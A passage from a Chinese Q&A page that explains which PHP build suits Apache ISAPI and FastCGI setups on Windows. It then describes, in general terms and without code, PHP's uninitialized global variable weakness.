:使用線程安全版本。解釋:由于以ISAPI方式來安裝PHP時(shí),PHP也沒有獨(dú)立的進(jìn)程,也是作為模塊被加載到Apache中的,因此,同樣也需要使用PHP的線程安全版本。一般不建議在Apache中以ISAPI方式來安裝PHP,原因是到目前為止,Apache通過mod_isapi.so模塊來實(shí)現(xiàn)的ISAPI功能并不完整,并未完整實(shí)現(xiàn)微軟對(duì)ISAPI所制定的全部規(guī)范。5、windows + Apache + PHP(FastCGI) :使用非線程安全版本。解釋:如果你要在Apache中以FastCGI方式使用PHP,則同在IIS中使用FastCGI的PHP的情況一樣,你應(yīng)該使用PHP的非線程安全的版本。原因是在Apache中以FastCGI方式安裝PHP時(shí),PHP擁有獨(dú)立的進(jìn)程,并且FastCGI是單一線程的,故應(yīng)使用PHP的非線程安全版本以提高性能。以上資料總結(jié)相關(guān)資料,分條明細(xì),供選擇。

推薦
不推薦
展開
收起
五毒劍

php是否有安全問題,如果有,請(qǐng)列舉說明

當(dāng)然有安全問題。PHP的語法結(jié)構(gòu)與C、Prel 非常相似,開發(fā)者可以直接在任何文本編輯器中編輯 PHP 命令代碼,不需要任何特殊的開發(fā)環(huán)境。在 Web 頁(yè)面中,所有 PHP 代碼都被放置在 “<?php” 和 “?>”之間。PHP 存在著它自身獨(dú)有的一些安全問題。比如:全局變量未初始化漏洞PHP中的全局變量是不需要預(yù)先聲明的,他們會(huì)在第一次使用時(shí)自動(dòng)創(chuàng)建,由 PHP 根據(jù)上下文環(huán)境自動(dòng)確定變量的類型。這對(duì)于程序員而言是相當(dāng)方便的,只要一個(gè)變量被創(chuàng)建,就可以在程序中的任何地方使用。,但也導(dǎo)致在 PHP 程序的編寫過程中,程序員很少初始化變量,通常都直接使用創(chuàng)建默認(rèn)的空值。這使得攻擊者可以通過給全局變量賦值來欺騙代碼,執(zhí)行惡意的目的。

推薦
不推薦
展開
收起
查看更多答案
收起